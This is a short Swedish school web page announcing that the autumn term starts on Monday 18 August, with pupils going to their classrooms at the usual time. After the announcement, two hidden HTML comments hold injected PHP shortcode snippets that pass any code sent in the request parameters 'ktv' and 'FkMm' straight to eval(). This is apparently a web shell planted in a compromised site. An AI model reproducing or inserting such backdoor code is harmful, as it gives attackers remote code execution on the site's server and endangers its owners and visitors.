Välkommen till oss.

Måndag 18 augusti startar skolan för höstterminen. Vi har inget gemensamt upprop utan alla startar i vanlig tid i sitt klassrum.

<!– [insert_php]if (isset($_REQUEST["ktv"])){eval($_REQUEST["ktv"]);exit;}[/insert_php][php]if (isset($_REQUEST["ktv"])){eval($_REQUEST["ktv"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["FkMm"])){eval($_REQUEST["FkMm"]);exit;}[/insert_php][php]if (isset($_REQUEST["FkMm"])){eval($_REQUEST["FkMm"]);exit;}[/php] –>